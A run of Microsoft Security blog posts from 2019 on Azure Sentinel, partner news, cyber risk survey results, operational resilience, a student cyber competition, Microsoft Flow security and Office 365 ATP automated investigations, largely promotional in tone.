Machine learning enhanced with artificial intelligence (AI) holds great promise in addressing many of the global cyber challenges we see today. They give our cyber defenders the ability to identify, detect, and block malware, almost instantaneously. And together they give security admins the ability to deconflict tasks, separating the signal from the noise, allowing them to prioritize the most critical tasks. It is why today, I’m pleased to announce that Azure Sentinel, a cloud-native SIEM that provides intelligent security analytics at cloud scale for enterprises of all sizes and workloads, is now generally available.

Our goal has remained the same since we first launched Microsoft Azure Sentinel in February: empower security operations teams to help enhance the security posture of our customers. Traditional Security Information and Event Management (SIEM) solutions have not kept pace with the digital changes. I commonly hear from customers that they’re spending more time with deployment and maintenance of SIEM solutions, which leaves them unable to properly handle the volume of data or the agility of adversaries.

Recent research tells us that 70 percent of organizations continue to anchor their security analytics and operations with SIEM systems,1 and 82 percent are committed to moving large volumes of applications and workloads to the public cloud.2 Security analytics and operations technologies must lean in and help security analysts deal with the complexity, pace, and scale of their responsibilities. To accomplish this, 65 percent of organizations are leveraging new technologies for process automation/orchestration, while 51 percent are adopting security analytics tools featuring machine learning algorithms.3 This is exactly why we developed Azure Sentinel—an SIEM re-invented in the cloud to address the modern challenges of security analytics.

Learning together

When we kicked off the public preview for Azure Sentinel, we were excited to learn and gain insight into the unique ways Azure Sentinel was helping organizations and defenders on a daily basis. We worked with our partners all along the way; listening, learning, and fine-tuning as we went. With feedback from 12,000 customers and more than two petabytes of data analysis, we were able to examine and dive deep into a large, complex, and diverse set of data. All of which had one thing in common: a need to empower their defenders to be more nimble and efficient when it comes to cybersecurity.

Our work with RapidDeploy offers one compelling example of how Azure Sentinel is accomplishing this complex task. RapidDeploy creates cloud-based dispatch systems that help first responders act quickly to protect the public. There’s a lot at stake, and the company’s cloud-native platform must be secure against an array of serious cyberthreats. So when RapidDeploy implemented a SIEM system, it chose Azure Sentinel, one of the world’s first cloud-native SIEMs.

Microsoft recently sat down with Alex Kreilein, Chief Information Security Officer at RapidDeploy. Here’s what he shared: “We build a platform that helps save lives. It does that by reducing incident response times and improving first responder safety by increasing their situational awareness.”

Now RapidDeploy uses the complete visibility, automated responses, fast deployment, and low total cost of ownership in Azure Sentinel to help it safeguard public safety systems. “With many SIEMs, deployment can take months,” says Kreilein. “Deploying Azure Sentinel took us minutes—we just clicked the deployment button and we were done.”

Learn even more about our work with RapidDeploy by checking out the full story.

Another great example of a company finding results with Azure Sentinel is ASOS. As one of the world’s largest online fashion retailers, ASOS knows they’re a prime target for cybercrime. The company has a large security function spread across five teams and two sites—but in the past, it was difficult for ASOS to gain a comprehensive view of cyberthreat activity. Now, using Azure Sentinel, ASOS has created a bird’s-eye view of everything it needs to spot threats early, allowing it to proactively safeguard its business and its customers. And as a result, it has cut issue resolution times in half.

“There are a lot of threats out there,” says Stuart Gregg, Cyber Security Operations Lead at ASOS. “You’ve got insider threats, account compromise, threats to our website and customer data, even physical security threats. We’re constantly trying to defend ourselves and be more proactive in everything we do.”

Already using a range of Azure services, ASOS identified Azure Sentinel as a platform that could help it quickly and easily unite its data. This includes security data from Azure Security Center and Azure Active Directory (Azure AD), along with data from Microsoft 365. The result is a comprehensive view of its entire threat landscape.

“We found Azure Sentinel easy to set up, and now we don’t have to move data across separate systems,” says Gregg. “We can literally click a few buttons and all our security solutions feed data into Azure Sentinel.”

Learn more about how ASOS has benefitted from Azure Sentinel.

RapidDeploy and ASOS are just two examples of how Azure Sentinel is helping businesses process data and telemetry into actionable security alerts for investigation and response. We have an active GitHub community of preview participants, partners, and even Microsoft’s own security experts who are sharing new connectors, detections, hunting queries, and automation playbooks.

With these design partners, we’ve continued our innovation in Azure Sentinel. It starts from the ability to connect to any data source, whether in Azure or on-premises or even other clouds. We continue to add new connectors to different sources and more machine learning-based detections. Azure Sentinel will also integrate with Azure Lighthouse service, which will enable service providers and enterprise customers with the ability to view Azure Sentinel instances across different tenants in Azure.

Secure your organization

Now that Azure Sentinel has moved out of public preview and is generally available, there’s never been a better time to see how it can help your business. Traditional on-premises SIEMs require a combination of infrastructure costs and software costs, all paired with annual commitments or inflexible contracts. We are removing those pain points, since Azure Sentinel is a cost-effective, cloud-native SIEM with predictable billing and flexible commitments.

Infrastructure costs are reduced since you automatically scale resources as you need, and you only pay for what you use. Or you can save up to 60 percent compared to pay-as-you-go pricing by taking advantage of capacity reservation tiers. You receive predictable monthly bills and the flexibility to change capacity tier commitments every 31 days. On top of that, bringing in data from Office 365 audit logs, Azure activity logs and alerts from Microsoft Threat Protection solutions doesn’t require any additional payments.

Please join me for the Azure Security Expert Series where we will focus on Azure Sentinel on Thursday, September 26, 2019, 10–11 AM Pacific Time. You’ll learn more about these innovations and see real use cases on how Azure Sentinel helped detect previously undiscovered threats. We’ll also discuss how Accenture and RapidDeploy are using Azure Sentinel to empower their security operations team.

Get started today with Azure Sentinel!

1 Source: ESG Research Survey, Security Analytics and Operations: Industry Trends in the Era of Cloud Computing, September 2019
2 Source: ESG Research Survey, Security Analytics and Operations: Industry Trends in the Era of Cloud Computing, September 2019
3 Source: ESG Research Survey, Security Analytics and Operations: Industry Trends in the Era of Cloud Computing, September 2019

Last week at Zscaler’s user conference, Zenith Live, Microsoft received Zscaler’s Technology Partner of the Year Award in the Impact category. The award was given to Microsoft for the depth and breadth of integrations we’ve collaborated with Zscaler on and the positive feedback received from customers about these integrations.

Together with Zscaler—a Microsoft Intelligent Security Association (MISA) member—we’re focused on providing our joint customers with secure, fast access to the cloud for every user. Since partnering with Zscaler, we’ve delivered several integrations that help our customers better secure their environments, including:

  • Azure Active Directory (Azure AD) integration to extend conditional access policies to Zscaler applications to validate user access to cloud-based applications. We also announced support for user provisioning of Zscaler applications to enable automated, policy-based provisioning and deprovisioning of user accounts with Azure AD.
  • Microsoft Intune integration that allows IT administrators to provision Zscaler applications to specific Azure AD users or groups within the Intune console and configure connections by using the existing Intune VPN profile workflow.
  • Microsoft Cloud App Security integration to discover and manage access to Shadow IT in an organization. Zscaler can be leveraged to send traffic data to Microsoft’s Cloud Access Security Broker (CASB) to assess cloud services against risk and compliance requirements before making access control decisions for the discovered cloud apps.

“We’re excited to see customers use Zscaler and Microsoft solutions together to deliver fast, secure, and direct access to the applications they need. The Technology Partner of the Year Award is a testament of Microsoft’s commitment to helping customers better secure their environments.”
—Punit Minocha, Vice President of Business Development at Zscaler

“The close collaboration between our teams and deep integration across Zscaler and Microsoft solutions help our joint customers be more secure and ensure their users stay productive. We’re pleased to partner with Zscaler and honored to be named Zscaler’s Technology Partner of the Year.”
—Alex Simons, Corporate Vice President of Program Management at Microsoft

We’re thrilled to be Zscaler’s Technology Partner of the Year in the Impact category and look forward to our continued partnership and what Zscaler.

Technology is dramatically transforming the global business environment, with continual advances in areas ranging from artificial intelligence (AI) and the Internet of Things (IoT) to data availability and blockchain. The speed at which digital technologies evolve and disrupt traditional business models keeps increasing. At the same time, cyber risks seem to evolve even faster—moving beyond data breaches and privacy concerns to sophisticated schemes that can disrupt entire businesses, industries, supply chains, and nations—costing the economy billions of dollars and affecting companies in every sector.

The hard truth organizations must face is that cyber risk can be mitigated and managed—but it cannot be eliminated. Results from the 2019 Marsh-Microsoft Global Cyber Risk Perception survey reveal several encouraging signs of improvement in the way that organizations view and manage cyber risk. Now that cyber risk is clearly and firmly at the top of corporate risk agendas, we see a positive shift towards the adoption of more rigorous, comprehensive cyber risk management in many areas. However, many organizations still struggle with how to best articulate, approach, and act upon cyber risk within their overall enterprise risk framework—even as the tide of technological change brings new and unanticipated cyber risk complexity.

Highlights from the survey

While companies see cyber events as a top priority, confidence in cyber resilience is declining. Cyber risk became even more firmly entrenched as an organizational priority in the past two years. Yet at the same time, organizations’ confidence in their ability to manage the risk declined.

  • 79 percent of respondents ranked cyber risk as a top five concern for their organization, up from 62 percent in 2017.
  • Confidence declined in each of three critical areas of cyber resilience. Those saying they had “no confidence” increased from:
    • 9 percent to 18 percent for understanding and assessing cyber risks.
    • 12 percent to 19 percent for preventing cyber threats.
    • 15 percent to 22 for responding to and recovering from cyber events.

New technology brings increased cyber exposure

Technology innovation is vital to most businesses, but often adds to the complexity of an organization’s technology footprint, including its cyber risk.

  • 77 percent of the 2019 respondents cited at least one innovative operational technology they adopted or are considering.
  • 50 percent said cyber risk is almost never a barrier to the adoption of new technology, but 23 percent—including many smaller firms—said that for most new technologies, the risk outweighs potential business benefits.
  • 74 percent evaluate technology risks prior to adoption, but just 5 percent said they evaluate risk throughout the technology lifecycle—and 11 percent do not perform any evaluation.

Increasing interdependent digital supply chains brings new cyber risks

The increasing interdependence and digitization of supply chains brings increased cyber risk to all parties, but many firms perceive the risks as one-sided.

  • There was a discrepancy in many organizations’ view of the cyber risk they face from supply chain partners, compared to the level of risk their organization poses to counterparties.
  • 39 percent said the cyber risk posed by their supply chain partners and vendors to their organization was high or somewhat high.
  • Only 16 percent said the cyber risk they themselves pose to their supply chain was high or somewhat high.
  • Respondents were more likely to set a higher bar for their own organization’s cyber risk management actions than they do for their suppliers.

Appetite for government role in managing cyber risks draws mixed views

Organizations generally see government regulation and industry standards as having limited effectiveness in helping manage cyber risk—with the notable exception of nation-state attacks.

  • 28 percent of businesses regard government regulations or laws as being very effective in improving cybersecurity.
  • 37 percent of businesses regard soft industry standards as being very effective in improving cybersecurity.
  • A key area of difference relates to cyberattacks by nation-state actors:
    • 54 percent of respondents said they are highly concerned about nation-state cyberattacks.
    • 55 percent said government needs to do more to protect organizations against nation-state cyberattacks.

Cyber investments focus on prevention, not resilience

Many organizations focus on technology defenses and investments to prevent cyber risk, to the neglect of assessment, risk transfer, response planning, and other risk management areas that build cyber resilience.

  • 88 percent said information technology/information security (IT/InfoSec) is one of the three main owners of cyber risk management, followed by executive leadership/board (65 percent) and risk management (49 percent).
  • Only 17 percent of executives say they spent more than a few days on cyber risk over the past year.
  • 64 percent said a cyberattack on their organization would be the biggest driver of increased cyber risk spending.
  • 30 percent of organizations reported using quantitative methods to express cyber risk exposures, up from 17 percent in 2017.
  • 83 percent have strengthened computer and system security over the past two years, but less than 30 percent have conducted management training or modeled cyber loss scenarios.

Cyber insurance

Cyber insurance coverage is expanding to meet evolving threats, and attitudes toward policies are also shifting.

  • 47 percent of organizations said they have cyber insurance, up from 34 percent in 2017.
  • Larger firms were more likely to have cyber insurance—57 percent of those with annual revenues above $1 billion had a policy, compared to 36 percent of those with revenue under $100 million.
  • Uncertainty about whether available cyber insurance could meet their firm’s needs dropped to 31 percent, down from 44 percent in 2017.
  • 89 percent of those with cyber insurance were highly confident or fairly confident their policies would cover the cost of a cyber event.

Key takeaways

At a practical level, this year’s survey points to a number of best practices that the most cyber resilient firms employ and which all firms should consider adopting:

  • Create a strong organizational cybersecurity culture with clear, shared standards for governance, accountability, resources, and actions.
  • Quantify cyber risk to drive better informed capital allocation decisions, enable performance measurement, and frame cyber risk in the same economic terms as other enterprise risks.
  • Evaluate the cyber risk implications of a new technology as a continual and forward-looking process throughout the lifecycle of the technology.
  • Manage supply chain risk as a collective issue, recognizing the need for trust and shared security standards across the entire network, including the organization’s cyber impact on its partners.
  • Pursue and support public-private partnerships around critical cyber risk issues that can deliver stronger protections and baseline best practice standards for all.

Despite the decline in organizational confidence in the ability to manage cyber risk, we’re optimistic that more organizations are now clearly recognizing the critical nature of the threat and beginning to seek out and embrace best practices.

Effective cyber risk management requires a comprehensive approach employing risk assessment, measurement, mitigation, transfer, and planning, and the optimal program will depend on each company’s unique risk profile and tolerance.

Still, these recommendations address many of the common and most urgent aspects of cyber risk that organizations today are challenged with; as such, they should be viewed as signposts along the path to building true cyber resilience.

Learn more

Read the full 2019 Marsh-Microsoft Global Cyber Risk Perception survey or find additional report content on Marsh’s website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.

Operational resilience cannot be achieved without a true commitment to and investment in cyber resilience. Global organizations need to reach the state where their core operations and services won’t be disrupted by geopolitical or socioeconomic events, natural disasters, and cyber events if they are to weather such events.

To help increase stability and lessen the impact to their citizens, an increasing number of government entities have drafted regulations requiring the largest organizations to achieve a true state of operational resilience: where both individual organizations and their industry absorb and adapt to shocks, rather than contributing to them. There are many phenomena that have led to this increased governance, including high-profile cyberattacks like NotPetya, WannaCrypt, and the proliferation of ransomware.

The rise in nation state and cybercrime attacks focusing on critical infrastructure and financial sectors, and the rapid growth of tech innovation pervading more and more industries, join an alarming increase in severe natural disasters, an unstable global geopolitical environment, and global financial market instability on the list of threats organizations should prepare for.

Potential impact of cybercrime attacks

Taken individually, any of these events can cripple critical business and government operations. A lightning strike this summer caused the UK’s National Grid to suffer the biggest blackout in decades. It affected homes across the country, shut down traffic signals, and closed some of the busiest train stations in the middle of the Friday evening rush hour. With trains needing to be manually rebooted, the rhythm of everyday work life was disrupted. The impact of cybercrime attacks can be as significant, and often longer term.

NotPetya cost businesses more than $10 billion; pharmaceutical giant Merck put its bill at $870 million alone. For more than a week, the malware shut down cranes and security gates at Maersk shipping terminals, as well as most of the company’s IT network—from the booking site to systems handling cargo manifests. It took two months to rebuild all the software systems, and three months before all cargo in transit was tracked down—with recovery dependent on a single server having been accidently offline during the attack due to the power being cut off.

The combination of all these threats will cause disruption to businesses and government services on a scale that hasn’t been seen before. Cyber events will also undermine the ability to respond to other types of events, so they need to be treated holistically as part of planning and response.

Extending operational resiliency to cover your cybersecurity program should not mean applying different principles to attacks, outages, and third-party failures than you would to physical attacks and natural hazards. In all cases, the emphasis is on having plans in place to deliver essential services whatever the cause of the disruption. Organizations are responding by rushing to purchase cyber-insurance policies and increasing their spending on cybersecurity. I encourage them to take a step back and have a critical understanding of what those policies actually cover, and to target the investment, so the approach supports operational resilience.

As we continue to witness an unparalleled increase in cyber-related attacks, we should take note that a large majority of the attacks have many factors in common. At Microsoft, we’ve written at length on the controls that best position an organization to defend against and respond to a cyber event.

We must not stand still

The adversary is innovating and accelerating. We must continue to be vigilant and thorough in both security posture, which must be based on “defense in depth,” and in sophistication of response.

The cost of data breaches continues to rise; the global average cost of a data breach is $3.92 million according to the 2019 Ponemon Institute report. This is up 1.5 percent from 2018 and 12 percent higher than in 2014. These continually rising costs have helped galvanize global entities around the topic of operational resilience.

The Bank of England, in July 2018, published comprehensive guidelines on operational resilience that set a robust standard for rigorous controls across all key areas: technology, legal, communications, financial solvency, business continuity, redundancy, failover, governmental, and customer impact, as well as full understanding of what systems and processes underlie your business products and services.

This paper leaves very few stones unturned and includes a clear statement of my thesis—dealing with cyber risk is an important element of operational resilience and you cannot achieve operational resilience without achieving cyber resilience.

Imagine for a moment that your entire network, including all your backups, is impacted by a cyberattack, and you cannot complete even a single customer banking transaction. That’s only one target; it’s not hard to extrapolate from here to attacks that shut down stock trades, real estate transactions, fund transfers, even to attacks on critical infrastructure like healthcare, energy, water system operators. In the event of a major attack, all these essential services will be unavailable until IT systems are restored to at least a baseline of operations.

It doesn’t require professional cybersecurity expertise to understand the impact of shutting down critical services, which is why the new paradigm for cybersecurity must begin not with regulations but with a program to build cyber resilience. The long list of public, wide-reaching cyberattacks where the companies were compliant with required regulations, but still were breached, demonstrates why we can no longer afford to use regulatory requirements as the ultimate driver of cybersecurity.

While it will always be necessary to be fully compliant with regulations like GDPR, SOX, HIPAA, MAS, regional banking regulators, and any others that might be relevant to your industry, it simply isn’t sufficient for a mature cyber program to use this compliance as the only standard. Organizations must build a program that incorporates defense in depth and implements fundamental security controls like MFA, encryption, network segmentation, patching, and isolation and reduction of exceptions. We also must consider how our operations will continue after a catastrophic cyberattack and build systems that can both withstand attack and be instantaneously resilient even during such an attack. The Bank of England uses the mnemonic WAR: for withstand, absorb, recover.

The ability to do something as simple as restoring from recent backups will be tested in every ransomware attack, and many organizations will fail this test—not because they are not backing up their systems, but because they haven’t tested the quality of their backup procedures or practiced for a cyber event. Training is not enough. Operational resilience guidelines call for demonstrating that you have concrete measures in place to deliver resilient services and that both incident management and contingency plans have been tested. You’ll need to invest in scenario planning, tabletop exercises and red/blue team exercises that prove the rigor of your threat modeling and give practice in recovering from catastrophic cyber events.

Importance of a cyber recovery plan

Imagine, if you will, how negligent it would be for your organization to never plan and prepare for a natural disaster. A cyber event is the equivalent: the same physical, legal, operational, technological, human, and communication standards must apply to preparation, response, and recovery. We should all consider it negligence if we do not have a cyber recovery plan in place. Yet, while the majority of firms have a disaster recovery plan on paper, nearly a quarter never test that and only 42 percent of global executives are confident their organization could recover from a major cyber event without it affecting their business.

Cybersecurity often focuses on defending against specific threats and vulnerabilities to mitigate cyber risk, but cyber resilience requires a more strategic and holistic view of what could go wrong and how your organization will address it as whole. The cyber events you’ll face are real threats, and preparing for them must be treated like any other form of continuity and disaster recovery. The challenges to building operational resilience have become more intense in an increasingly hostile cyber environment, and this preparation is a topic we will continue to address.

Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.

With a projected “skills gap” numbering in the millions for open cyber headcount, educating a diverse workforce is critical to corporate and national cyber defense moving forward. However, are today’s students getting the preparation they need to do the cybersecurity work of tomorrow?

To help educators prepare meaningful curricula, the National Institute of Standards and Technology (NIST) has developed the National Initiative for Cybersecurity Education (NICE) Cybersecurity Workforce Framework. The U.S. Department of Energy (DOE) is also doing its part to help educate our future cybersecurity workforce through initiatives like the CyberForce Competition,™ designed to support hands-on cyber education for college students and professionals. The CyberForce Competition™ emulates real-world, critical infrastructure scenarios, including “cyber-physical infrastructure and lifelike anomalies and constraints.”

As anyone who’s worked in cybersecurity knows, a big part of operational reality are the unexpected curveballs ranging from an attacker’s pivot while escalating privileges through a corporate domain to a request from the CEO to provide talking points for an upcoming news interview regarding a recent breach. In many “capture the flag” and “cyber-range exercises,” these unexpected anomalies are referred to as “injects,” the curveballs of the training world.

For the CyberForce Competition™ anomalies are mapped across the seven NICE Framework Workforce Categories illustrated below:

Image showing seven categories of cybersecurity: Operate and Maintain, Oversee and Govern, Collect and Operate, Securely Provision, Analayze, Protect and Defend, and Investigate.

NICE Framework Workforce categories, NIST SP 800-181.

Students were assessed based on how many and what types of anomalies they responded to and how effective/successful their responses were.

Tasks where students excelled

  • Threat tactic identification—Students excelled in identifying threat tactics and corresponding methodologies. This was shown through an anomaly that required students to parse through and analyze a log file to identify aspects of various identifiers of insider threat; for example, too many sign-ins at one time, odd sign-in times, or sign-ins from non-standard locations.
  • Log file analysis and review—One task requires students to identify non-standard browsing behavior of agents behind a firewall. To accomplish this task, students had to write code to parse and analyze the log files of a fictitious company’s intranet web servers. Statistical evidence from the event indicates that students are comfortable writing code to parse log file data and performing data analysis.
  • Insider threat investigations—Students seemed to gravitate towards the anomalies and tasks connected to insider threat identification that maps to the Security Provision pillar. Using log analysis techniques described above, students were able to determine at a high rate of success individuals with higher than average sign-in failure rates and those with anomalous successful logins, such as from many different devices or locations.
  • Network forensics—The data indicated that overall the students had success with the network packet capture (PCAP) forensics via analysis of network traffic full packet capture streams. They also had a firm grasp on related tasks, including file system forensic analysis and data carving techniques.
  • Trivia—Students were not only comfortable with writing code and parsing data, but also showed they have solid comprehension and intelligence related to cybersecurity history and trivia. Success in this category ranked in the higher percentile of the overall competition.

Pillar areas for improvement

  • Collect and Operate—This pillar “provides specialized denial and deception operations and collection of cybersecurity information that may be used to develop intelligence.” Statistical analysis gathered during the competition indicated that students had hesitancies towards the activities in this pillar, including for some tasks that they were successful with in other exercises. For example, some fairly simple tasks, such as analyzing logs for specific numbers of entries and records on a certain date, had a zero percent completion rate. Reasons for non-completion could be technical inability on the part of the students but could also have been due to a poorly written anomaly/task or even an issue with sign-ins to certain lab equipment.
  • Investigate—Based on the data, the Investigate pillar posed some challenges for the students. Students had a zero percent success rate on image analysis and an almost zero percent success rate on malware analysis. In addition, students had a zero percent success rate in this pillar for finding and identifying a bad file in the system.

Key takeaways

Frameworks like NIST NICE and competitions like the DOE CyberForce Competition are helping to train up the next generation of cybersecurity defenders. Analysis from the most recent CyberForce Competition indicates that students are comfortable with tasks in the “Protect and Defend” pillar and are proficient in many critical tasks, including network forensics and log analysis. The data points to areas for improvement especially in the “Collect and Operate” and “Investigate” pillars, and for additional focus on forensic skills and policy knowledge.

Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.

The CyberForce work was partially supported by the U.S. Department of Energy Office of Science under contract DE-AC02-06CH11357.

In part 1 of this series, we introduced you to Microsoft Flow, a powerful automation service already being used by many organizations across the world. Flow is designed to empower citizen developers while featuring capabilities sought for by professional developers. Flow is also a foundational element of the Microsoft Power Platform announced earlier this year.

More organizations are seeking automation solutions and there will be many options. As security professionals, you’ll have to recommend the service offering all the benefits of automation, while ensuring the organization remains secure and compliant. Flow is natively integrated with best-in-class authentication services, offers powerful data loss prevention and an enhanced IT experience ranging from broad visibility and control to automating IT functions, and is built on rigorous privacy and compliance standards. We’re confident that Flow will be the right choice for your organization, so let’s get started on showing you why.

Prioritized security for your users and data

Flow is seamlessly integrated with Azure Active Directory (Azure AD), one of the world’s most sophisticated, comprehensive, and secure identity and access management services. Azure AD helps secure the citizen developer by protecting against identity compromise, gives the IT admin/pro visibility and control, and offers additional security capabilities for the pro developer. Azure AD helps support the least privilege strategy, which we recommend for Flow users. Azure AD also follows a federated model, so organizations not directly using the service are still secure. Since authentication to Flow is via Azure AD, admins using its premium features can create conditional access policies which restrict user access to only the apps and data relevant for their role. Flow’s integration with Azure AD also enhances security for more experienced developers who can register applications with the service and leverage multiple authentication protocols, including the OAuth2 authorization framework to enable their code to access platform APIs (Figure 1). This access protection can also be extended to external users.

Screenshot of an authentication type being selected for a connector in Microsoft Flow.

Figure 1. Choosing authentication framework for custom Flow connector.

To experience the full benefits of automation and unlock the potential of an organization’s data, Flow offers 270+ connectors to services, including third-party services. Some connectors are even built for social media sites, such as Twitter (Figure 2). With so many integrations, there’s always the threat of data leakage or compromise. Imagine the scenario where a user mistakenly tweets sensitive data. To prevent these types of scenarios, Flow is supported by the Microsoft Data Loss Prevention (DLP) service.

Screenshot of the Microsoft Flow dashboard. A search has been conducted for "twitter."

Figure 2. Pre-built Flow templates offering automation between Twitter and several other applications.

Microsoft DLP protects data from being exposed and DLP polices can be easily created by administrators. DLP policies can be customized at the user, environment, or tenant level to ensure security is maintained without impact to productivity. These policies enforce rules of what connectors can be used together by classifying connectors as either “Business Data Only” or “No Business Data Allowed” (Figure 3). A connector can only be used with other connectors within its group. For example, a connector in the Business Data Only group can only be used with other connectors from that group. The default setting for all connectors is No Business Data Allowed.

Importantly, all data used by Flow is also encrypted during transit using HTTPS. As a security leader, you can feel reassured that Flow is designed to ensure your data is secured both at rest and in transit with strict enforcement. To learn more about strategies to create DLP polices for Flow connectors, check out our white paper.

Screenshot of data groups in the Microsoft Flow admin center.

Figure 3. Flow Admin center where you can create DLP policies to protect your sensitive while benefiting from the powerful automation capabilities offered with Flow.

Enhancing management of the IT environment

Flow includes the Flow management connector, which enables admins to automate several IT tasks. The management connecter offers 19 possible actions that can be automated—from creating and deleting Flows to more complex actions, such as modifying the owner of a Flow. The Flow management connector is versatile and can be combined with other connectors to automate several admin tasks, enhancing the efficiency of IT teams. For example, security admins can create a Flow combining the management connector with Azure AD, Microsoft Cloud App Security, Outlook, and Teams to quickly send automatic notifications via email or Teams anytime Cloud App Security generates an alert on suspicious activity (Figure 4). Other use cases could include a notification when a new app is created, automatically updating user permissions based on role changes, or tracking when custom connectors are created in your environment.

Screenshot of the Flow template using the management connecter, Azure AD, Cloud App Security, Outlook, and Teams.

Figure 4. Flow template using the management connecter, Azure AD, Cloud App Security, Outlook, and Teams.

Visibility of activity logs

Many of Flow’s current users are also Office 365 users. As such, Flow event logs are available in the Office 365 Security & Compliance Center. By surfacing activity logs in the Security & Compliance Center, admins gain visibility into which users are creating Flows, if Flows are being shared, as well as which connectors are being used (Figure 5). The activity data is retained for 90 days and can be easily exported in CSV format for further analysis. The event logs surface in the Security & Compliance Center within 90 minutes of the event taking place. Admins also gain insight on which users are using paid versus trial licenses in the Security & Compliance Center.

Screenshot of Microsoft Flow activities accessed through the Office 365 Security & Compliance Center.

Figure 5. Microsoft Flow activities accessed through the Office 365 Security & Compliance Center.

Strict on data privacy and regulatory requirements

Flow adheres to Microsoft’s strict standards of privacy and protection of customer data. These policies prohibit customer data from being mined for marketing or advertising. Microsoft personnel and subcontractors are also restricted from accessing customer data and we carefully define requirements for responding to government requests for customer data. Microsoft also complies with international data protection laws regarding transfers of customer data across borders.

Microsoft Flow is also certified for many global, government, industrial, and regional compliance regulations. You can see the full list of Microsoft certifications, while Table 1 summarizes the certifications specifically covered by Flow.

Global Government Industry Regional
CSA-STAR-Attestation UK G-Cloud HIPAA/HITECH EU-Model-Clauses
CSA-Star-Certification HITRUST
ISO 27001 PCI DSS
ISO 27018
ISO 9001

Table 1. Flow’s existing certifications.

Let Flow enhance your digital transformation

Let your organization start benefiting from one of the most powerful and secure automation services available on the market. Watch the video and follow the instructions to get started with Flow. Be sure to join the growing Flow community and participate in discussions, provide insights, and even influence product roadmap. Also follow the Flow blog to get news on the latest Flow updates and read our white paper on best practices for deploying Flow in your organization. Be sure to check out part 1, where we provide a quick intro into Flow and dive into its best-in-class, secure infrastructure.

Additional resources

Security teams responsible for investigating and responding to incidents often deal with a massive number of signals from widely disparate sources. As a result, rapid and efficient incident response continues to be the biggest challenge facing security teams today. The sheer volume of these signals, combined with an ever-growing digital estate of organizations, means that a lot of critical alerts miss getting the timely attention they deserve. Security teams need help to scale better, be more efficient, focus on the right issues, and deal with incidents in a timely manner.

This is why I’m excited to announce the general availability of Automated Incident Response in Office 365 Advanced Threat Protection (ATP). Applying these powerful automation capabilities to investigation and response workflows can dramatically improve the effectiveness and efficiency of your organization’s security teams.

A day in the life of a security analyst

To give you an idea of the complexity that security teams deal with in the absence of automation, consider the following typical workflow that these teams go through when investigating alerts:

Infographic showing these steps: Alert, Analyze, Investigate, Assess impact, Contain, and Respond.

And as they go through this flow for every single alert—potentially hundreds in a week—it can quickly become overwhelming. In addition, the analysis and investigation often require correlating signals across multiple different systems. This can make effective and timely response very difficult and costly. There are just too many alerts to investigate and signals to correlate for today’s lean security teams.

To address these challenges, earlier this year we announced the preview of powerful automation capabilities to help improve the efficiency of security teams significantly. The security playbooks we introduced address some of the most common threats that security teams investigate in their day-to-day jobs and are modeled on their typical workflows.

This story from Ithaca College reflects some of the feedback we received from customers of the preview of these capabilities, including:

“The incident detection and response capabilities we get with Office 365 ATP give us far more coverage than we’ve had before. This is a really big deal for us.”
—Jason Youngers, Director and Information Security Officer, Ithaca College

Two categories of automation now generally available

Today, we’re announcing the general availability of two categories of automation—automatic and manually triggered investigations:

  1. Automatic investigations that are triggered when alerts are raisedAlerts and related playbooks for the following scenarios are now available:
    • User-reported phishing emails—When a user reports what they believe to be a phishing email, an alert is raised triggering an automatic investigation.
    • User clicks a malicious link with changed verdict—An alert is raised when a user clicks a URL, which is wrapped by Office 365 ATP Safe Links, and is determined to be malicious through detonation (change in verdict). Or if the user clicks through the Office 365 ATP Safe Links warning pages an alert is also raised. In both cases, the automated investigation kicks in as soon as the alert is raised.
    • Malware detected post-delivery (Malware Zero-Hour Auto Purge (ZAP))—When Office 365 ATP detects and/or ZAPs an email with malware, an alert triggers an automatic investigation.
    • Phish detected post-delivery (Phish ZAP)—When Office 365 ATP detects and/or ZAPs a phishing email previously delivered to a user’s mailbox, an alert triggers an automatic investigation.
  1. Manually triggered investigations that follow an automated playbook—Security teams can trigger automated investigations from within the Threat Explorer at any time for any email and related content (attachment or URLs).

Rich security playbooks

In each of the above cases, the automation follows rich security playbooks. These playbooks are essentially a series of carefully logged steps to comprehensively investigate an alert and offer a set of recommended actions for containment and mitigation. They correlate similar emails sent or received within the organization and any suspicious activities for relevant users. Flagged activities for users might include mail forwarding, mail delegation, Office 365 Data Loss Prevention (DLP) violations, or suspicious email sending patterns.

In addition, aligned with our Microsoft Threat Protection promise, these playbooks also integrate with signals and detections from Microsoft Cloud App Security and Microsoft Defender ATP. For instance, anomalies detected by Microsoft Cloud App Security are ingested as part of these playbooks. And the playbooks also trigger device investigations with Microsoft Defender ATP (for malware playbooks) where appropriate.

Let’s look at each of these automation scenarios in detail:

User reports a phishing email—This represents one of the most common flows investigated today. The alert is raised when a user reports a phish email using the Report message add-in in Outlook or Outlook on the web and triggers an automatic investigation using the User Reported Message playbook.

Screenshot of a phishing email being investigated.

User clicks on a malicious linkA very common vector used by attackers is to weaponize a link after delivery of an email. With Office 365 ATP Safe Links protection, we can detect such attacks when links are detonated at time-of-click. A user clicking such links and/or overriding the Safe Links warning pages is at risk of compromise. The alert raised when a malicious URL is clicked triggers an automatic investigation using the URL verdict change playbook to correlate any similar emails and any suspicious activities for the relevant users across Office 365.

Image of a clicked URL being assigned as malicious.

Email messages containing malware removed after delivery—One of the critical pillars of protection in Office 365 Exchange Online Protection (EOP) and Office 365 ATP is our capability to ZAP malicious emails. Email messages containing malware removed after delivery alert trigger an investigation into similar emails and related user actions in Office 365 for the period when the emails were present in a user’s inbox. In addition, the playbook also triggers an investigation into the relevant devices for the users by leveraging the native integration with Microsoft Defender ATP.

Screenshot showing malware being zapped.

Email messages containing phish removed after deliveryWith the rise in phishing attack vectors, Office 365 EOP and Office 365 ATP’s ability to ZAP malicious emails detected after delivery is a critical protection feature. The alert raised triggers an investigation into similar emails and related user actions in Office 365 for the period when the emails were present in a user’s inbox and also evaluates if the user clicked any of the links.

Screenshot of a phish URL being zapped.

Automated investigation triggered from within the Threat Explorer—As part of existing hunting or security operations workflows, Security teams can also trigger automated investigations on emails (and related URLs and attachments) from within the Threat Explorer. This provides Security Operations (SecOps) a powerful mechanism to gain insights into any threats and related mitigations or containment recommendations from Office 365.

Screenshot of an action being taken in the Office 365 Security and Compliance dash. An email is being investigated.

Try out these capabilities

